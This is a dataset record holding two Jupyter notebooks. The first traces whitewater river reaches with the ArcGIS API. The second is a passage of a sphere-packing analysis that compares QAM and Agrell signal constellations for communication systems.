[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72e0e783fb1b8895bf70d20e54f1e8c3e35e12b
3,424
ipynb
Jupyter Notebook
notebooks/03_reach_layer_geometry.ipynb
whitewater-gis/nhdplus-reach-tracer
8358dc52ee0cde814c0919ad23c8dfe45d156129
[ "Apache-2.0" ]
2
2019-03-25T04:54:56.000Z
2019-03-25T15:41:49.000Z
notebooks/03_reach_layer_geometry.ipynb
whitewater-gis/water-reach-tracer
8358dc52ee0cde814c0919ad23c8dfe45d156129
[ "Apache-2.0" ]
3
2020-03-24T17:04:13.000Z
2020-06-08T17:06:33.000Z
notebooks/03_reach_layer_geometry.ipynb
whitewater-gis/water-reach-tracer
8358dc52ee0cde814c0919ad23c8dfe45d156129
[ "Apache-2.0" ]
null
null
null
23.292517
115
0.556951
[ [ [ "from arcgis.gis import GIS\nimport os\n\nfrom dotenv import load_dotenv, find_dotenv\nload_dotenv(find_dotenv())\n\nimport sys\nsys.path.append('../src')\n\nimport reach_tools\n\n%load_ext autoreload\n%autoreload 2", "_____no_output_____" ], [ "url_reach_line = os.getenv('URL_REACH_LINE')\nurl_reach_centroid = os.getenv('URL_REACH_CENTROID')\nurl_reach_points = os.getenv('URL_REACH_POINT')\n\nreach_id_ldub = 2156\nreach_id_farmies = 2269\nreach_id_truss = 2270\nreach_id_bz = 3064\nreach_id_canyon = 3066\nreach_id_opal = 5199\n\nlst_reach_id = [reach_id_ldub, reach_id_farmies, reach_id_truss, reach_id_bz, reach_id_canyon, reach_id_opal]", "_____no_output_____" ], [ "gis = GIS(username=os.getenv('ARCGIS_USERNAME'), password=os.getenv('ARCGIS_PASSWORD'))\ngis", "_____no_output_____" ], [ "lyr_reach_line = reach_tools.ReachFeatureLayer(url_reach_line, gis)\nlyr_reach_centroid = reach_tools.ReachFeatureLayer(url_reach_centroid, gis)\nlyr_reach_points = reach_tools.ReachPointFeatureLayer(url_reach_points, gis)", "_____no_output_____" ], [ "reach = reach_tools.Reach.get_from_aw(2270)\nwebmap = reach.update_putin_takeout_and_trace(webmap=True)\nwebmap", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
e72e216a8af0651f829eec1b9c1ae6cbdb70c4f2
295,389
ipynb
Jupyter Notebook
RBF/analysis_spherepacking.ipynb
v-i-s-h/dl-vi-comm
80032588a5e6e13bdc397ce9bd51fed73a6045bf
[ "MIT" ]
4
2020-07-30T10:45:03.000Z
2022-01-21T01:03:53.000Z
RBF/analysis_spherepacking.ipynb
v-i-s-h/dl-vi-comm
80032588a5e6e13bdc397ce9bd51fed73a6045bf
[ "MIT" ]
null
null
null
RBF/analysis_spherepacking.ipynb
v-i-s-h/dl-vi-comm
80032588a5e6e13bdc397ce9bd51fed73a6045bf
[ "MIT" ]
1
2021-02-26T10:55:27.000Z
2021-02-26T10:55:27.000Z
164.105
25,412
0.794254
[ [ [ "# Analysis of Sphere packing efficeincy", "_____no_output_____" ] ], [ [ "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial.distance import cdist # For calculating QPSK decoding\nimport dill\nfrom itertools import product, cycle\n\nimport tensorflow.keras.backend as K", "_____no_output_____" ] ], [ [ "System Configuration", "_____no_output_____" ] ], [ [ "blkSize = 4\nchDim = 2\n\n# Input\ninVecDim = 2 ** blkSize # 1-hot vector length for block\nencDim = 2*chDim\n\nSNR_range_dB = np.arange( 0.0, 11.0, 1.0 )\n\none_hot_code = np.eye(inVecDim)", "_____no_output_____" ] ], [ [ "## Traditional Systems", "_____no_output_____" ], [ "### QAM", "_____no_output_____" ] ], [ [ "qam_map = np.array(list(map(list, product([-1, +1], repeat=blkSize))))\nqam_sym_pow = np.mean(np.sum(qam_map*qam_map,axis=1))\nprint( \"QAM Avg. Tx Power:\", qam_sym_pow )\n\nnoisePower = qam_sym_pow * 10.0**(-SNR_range_dB/10.0)\nn0_per_comp = noisePower/(2*chDim)", "QAM Avg. Tx Power: 4.0\n" ] ], [ [ "### Agrell Map", "_____no_output_____" ] ], [ [ "agrell_map = []\nif blkSize==2 and chDim==1:\n agrell_map = np.array([\n [ -1.0, -1.0 ],\n [ -1.0, 1.0 ],\n [ 1.0, -1.0 ],\n [ 1.0, 1.0 ]\n ])\nelif blkSize==4 and chDim==2:\n agrell_map = np.array([\n [2.148934030042627, 0.0, 0.0, 0.0],\n [0.7347204676695321, 1.4142135623730951, 0.0, 0.0],\n [0.7347204676695321, -1.4142135623730951, 0.0, 0.0],\n [0.7347204676695321, 0.0, 1.4142135623730951, 0.0],\n [0.7347204676695321, 0.0, -1.4142135623730951, 0.0],\n [0.7347204676695321, 0.0, 0.0, 1.4142135623730951],\n [0.7347204676695321, 0.0, 0.0, -1.4142135623730951],\n [-0.6174729817844246, 1.0, 1.0, 1.0],\n [-0.6174729817844246, 1.0, 1.0, -1.0],\n [-0.6174729817844246, 1.0, -1.0, 1.0],\n [-0.6174729817844246, 1.0, -1.0, -1.0],\n [-0.6174729817844246, -1.0, 1.0, 1.0],\n [-0.6174729817844246, -1.0, 1.0, -1.0],\n [-0.6174729817844246, -1.0, -1.0, 1.0],\n [-0.6174729817844246, -1.0, -1.0, -1.0],\n [-1.6174729817844242, 0.0, 0.0, 0.0]\n ])\nelif blkSize==8 and chDim==4:\n agrell_map = np.array([\n [ -256.0, -256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, -248.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 264.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -128.0, -128.0, -120.0, -136.0, -136.0, -114.0, -117.0, -139.0 ],\n [ -128.0, -128.0, -120.0, -136.0, -136.0, -114.0, 139.0, 117.0 ],\n [ -128.0, -128.0, -120.0, -136.0, -136.0, 142.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, -136.0, -136.0, 142.0, 139.0, -139.0 ],\n [ -128.0, -128.0, -120.0, -136.0, 120.0, -114.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, -136.0, 120.0, -114.0, 139.0, -139.0 ],\n [ -128.0, -128.0, -120.0, -136.0, 120.0, 142.0, -117.0, -139.0 ],\n [ -128.0, -128.0, -120.0, -136.0, 120.0, 142.0, 139.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, -136.0, -114.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, -136.0, -114.0, 139.0, -139.0 ],\n [ -128.0, -128.0, -120.0, 120.0, -136.0, 142.0, -117.0, -139.0 ],\n [ -128.0, -128.0, -120.0, 120.0, -136.0, 142.0, 139.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -370.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -114.0, -373.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -114.0, -117.0, -139.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -114.0, -117.0, 373.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -114.0, 139.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, 142.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, 142.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, -136.0, -136.0, -114.0, -117.0, 117.0 ],\n [ -128.0, -128.0, 136.0, -136.0, -136.0, -114.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, -136.0, -136.0, 142.0, -117.0, -139.0 ],\n [ -128.0, -128.0, 136.0, -136.0, -136.0, 142.0, 139.0, 117.0 ],\n [ -128.0, -128.0, 136.0, -136.0, 120.0, -114.0, -117.0, -139.0 ],\n [ -128.0, -128.0, 136.0, -136.0, 120.0, -114.0, 139.0, 117.0 ],\n [ -128.0, -128.0, 136.0, -136.0, 120.0, 142.0, -117.0, 117.0 ],\n [ -128.0, -128.0, 136.0, -136.0, 120.0, 142.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, -136.0, -114.0, -117.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, -136.0, -114.0, 139.0, 117.0 ],\n [ -128.0, -128.0, 136.0, 120.0, -136.0, 142.0, -117.0, 117.0 ],\n [ -128.0, -128.0, 136.0, 120.0, -136.0, 142.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, 120.0, -114.0, -117.0, 117.0 ],\n [ -128.0, -128.0, 136.0, 120.0, 120.0, -114.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, 120.0, 142.0, -117.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, 120.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, -136.0, -114.0, -117.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, -136.0, -114.0, 139.0, -139.0 ],\n [ -128.0, 128.0, -120.0, -136.0, -136.0, 142.0, -117.0, -139.0 ],\n [ -128.0, 128.0, -120.0, -136.0, -136.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, 120.0, -114.0, -117.0, -139.0 ],\n [ -128.0, 128.0, -120.0, -136.0, 120.0, -114.0, 139.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, 120.0, 142.0, -117.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, 120.0, 142.0, 139.0, -139.0 ],\n [ -128.0, 128.0, -120.0, 120.0, -136.0, -114.0, -117.0, -139.0 ],\n [ -128.0, 128.0, -120.0, 120.0, -136.0, -114.0, 139.0, 117.0 ],\n [ -128.0, 128.0, -120.0, 120.0, -136.0, 142.0, -117.0, 117.0 ],\n [ -128.0, 128.0, -120.0, 120.0, -136.0, 142.0, 139.0, -139.0 ],\n [ -128.0, 128.0, -120.0, 120.0, 120.0, -114.0, -117.0, 117.0 ],\n [ -128.0, 128.0, -120.0, 120.0, 120.0, -114.0, 139.0, -139.0 ],\n [ -128.0, 128.0, -120.0, 120.0, 120.0, 142.0, -117.0, -139.0 ],\n [ -128.0, 128.0, -120.0, 120.0, 120.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, -136.0, -136.0, -114.0, -117.0, -139.0 ],\n [ -128.0, 128.0, 136.0, -136.0, -136.0, -114.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, -136.0, -136.0, 142.0, -117.0, 117.0 ],\n [ -128.0, 128.0, 136.0, -136.0, -136.0, 142.0, 139.0, -139.0 ],\n [ -128.0, 128.0, 136.0, -136.0, 120.0, -114.0, -117.0, 117.0 ],\n [ -128.0, 128.0, 136.0, -136.0, 120.0, -114.0, 139.0, -139.0 ],\n [ -128.0, 128.0, 136.0, -136.0, 120.0, 142.0, -117.0, -139.0 ],\n [ -128.0, 128.0, 136.0, -136.0, 120.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, -136.0, -114.0, -117.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, -136.0, -114.0, 139.0, -139.0 ],\n [ -128.0, 128.0, 136.0, 120.0, -136.0, 142.0, -117.0, -139.0 ],\n [ -128.0, 128.0, 136.0, 120.0, -136.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, 120.0, -114.0, -117.0, -139.0 ],\n [ -128.0, 128.0, 136.0, 120.0, 120.0, -114.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, 120.0, 142.0, -117.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 0.0, -256.0, -248.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 264.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, -242.0, -245.0, 245.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, 248.0, -242.0, -245.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, 248.0, -242.0, 11.0, 245.0 ],\n [ 0.0, 0.0, -248.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, 248.0, -8.0, -242.0, -245.0, -11.0 ],\n [ 0.0, 0.0, -248.0, 248.0, -8.0, -242.0, 11.0, 245.0 ],\n [ 0.0, 0.0, -248.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, -242.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, -242.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, -242.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, -242.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, -245.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, -245.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, 267.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, 267.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 270.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 270.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 270.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 270.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, -242.0, -245.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, -242.0, -245.0, 245.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, 248.0, -242.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, 248.0, -242.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, 248.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, -248.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 264.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 128.0, -128.0, -120.0, -136.0, -136.0, -114.0, -117.0, 117.0 ],\n [ 128.0, -128.0, -120.0, -136.0, -136.0, -114.0, 139.0, -139.0 ],\n [ 128.0, -128.0, -120.0, -136.0, -136.0, 142.0, -117.0, -139.0 ],\n [ 128.0, -128.0, -120.0, -136.0, -136.0, 142.0, 139.0, 117.0 ],\n [ 128.0, -128.0, -120.0, -136.0, 120.0, -114.0, -117.0, -139.0 ],\n [ 128.0, -128.0, -120.0, -136.0, 120.0, -114.0, 139.0, 117.0 ],\n [ 128.0, -128.0, -120.0, -136.0, 120.0, 142.0, -117.0, 117.0 ],\n [ 128.0, -128.0, -120.0, -136.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, -136.0, -114.0, -117.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, -136.0, -114.0, 139.0, 117.0 ],\n [ 128.0, -128.0, -120.0, 120.0, -136.0, 142.0, -117.0, 117.0 ],\n [ 128.0, -128.0, -120.0, 120.0, -136.0, 142.0, 139.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, 120.0, -114.0, -117.0, 117.0 ],\n [ 128.0, -128.0, -120.0, 120.0, 120.0, -114.0, 139.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, 120.0, 142.0, -117.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, 120.0, 142.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, -136.0, -136.0, -114.0, -117.0, -139.0 ],\n [ 128.0, -128.0, 136.0, -136.0, -136.0, -114.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, -136.0, -136.0, 142.0, -117.0, 117.0 ],\n [ 128.0, -128.0, 136.0, -136.0, -136.0, 142.0, 139.0, -139.0 ],\n [ 128.0, -128.0, 136.0, -136.0, 120.0, -114.0, -117.0, 117.0 ],\n [ 128.0, -128.0, 136.0, -136.0, 120.0, -114.0, 139.0, -139.0 ],\n [ 128.0, -128.0, 136.0, -136.0, 120.0, 142.0, -117.0, -139.0 ],\n [ 128.0, -128.0, 136.0, -136.0, 120.0, 142.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, -136.0, -114.0, -117.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, -136.0, -114.0, 139.0, -139.0 ],\n [ 128.0, -128.0, 136.0, 120.0, -136.0, 142.0, -117.0, -139.0 ],\n [ 128.0, -128.0, 136.0, 120.0, -136.0, 142.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, 120.0, -114.0, -117.0, -139.0 ],\n [ 128.0, -128.0, 136.0, 120.0, 120.0, -114.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, 120.0, 142.0, -117.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, -136.0, -114.0, -117.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, -136.0, -114.0, 139.0, 117.0 ],\n [ 128.0, 128.0, -120.0, -136.0, -136.0, 142.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, -136.0, -136.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, 120.0, -114.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, -136.0, 120.0, -114.0, 139.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, 120.0, 142.0, -117.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, 120.0, 142.0, 139.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, -136.0, -114.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, -136.0, -114.0, 139.0, -139.0 ],\n [ 128.0, 128.0, -120.0, 120.0, -136.0, 142.0, -117.0, -139.0 ],\n [ 128.0, 128.0, -120.0, 120.0, -136.0, 142.0, 139.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -370.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -114.0, -373.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -114.0, -117.0, -139.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -114.0, -117.0, 373.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -114.0, 139.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, 142.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, 136.0, -136.0, -136.0, -114.0, -117.0, 117.0 ],\n [ 128.0, 128.0, 136.0, -136.0, -136.0, -114.0, 139.0, -139.0 ],\n [ 128.0, 128.0, 136.0, -136.0, -136.0, 142.0, -117.0, -139.0 ],\n [ 128.0, 128.0, 136.0, -136.0, -136.0, 142.0, 139.0, 117.0 ],\n [ 128.0, 128.0, 136.0, -136.0, 120.0, -114.0, -117.0, -139.0 ],\n [ 128.0, 128.0, 136.0, -136.0, 120.0, -114.0, 139.0, 117.0 ],\n [ 128.0, 128.0, 136.0, -136.0, 120.0, 142.0, -117.0, 117.0 ],\n [ 128.0, 128.0, 136.0, -136.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, 136.0, 120.0, -136.0, -114.0, -117.0, -139.0 ],\n [ 128.0, 128.0, 136.0, 120.0, -136.0, -114.0, 139.0, 117.0 ],\n [ 128.0, 128.0, 136.0, 120.0, -136.0, 142.0, -117.0, 117.0 ],\n [ 128.0, 128.0, 136.0, 120.0, -136.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, 136.0, 120.0, 120.0, -114.0, -117.0, 117.0 ],\n [ 128.0, 128.0, 136.0, 120.0, 120.0, -114.0, 139.0, -139.0 ],\n [ 128.0, 128.0, 136.0, 120.0, 120.0, 142.0, -117.0, -139.0 ],\n [ 128.0, 128.0, 136.0, 120.0, 120.0, 142.0, 139.0, 117.0 ],\n [ 256.0, -256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, -248.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 264.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 ] ])\nelse:\n raise NotImplementedError(\"Not implemented (blkSize={},chDim={})\".format(blkSize,chDim))\n\nagrell_sym_pow = np.mean(np.sum(agrell_map*agrell_map,axis=1))\nprint( \"Agrell Avg. Tx Power:\", agrell_sym_pow )\n\nnoisePower = agrell_sym_pow * 10.0**(-SNR_range_dB/10.0)\nn0_per_comp = noisePower/(2*chDim)", "Agrell Avg. Tx Power: 3.095200273238941\n" ] ], [ [ "### Compute Metrics", "_____no_output_____" ], [ "QAM", "_____no_output_____" ] ], [ [ "qam_map = np.array(list(map(list, product([-1, +1], repeat=blkSize))))\n\nqam_sym_pow = np.mean(np.sum(qam_map*qam_map,axis=1))\nprint( \"QAM Avg. Tx Power:\", qam_sym_pow 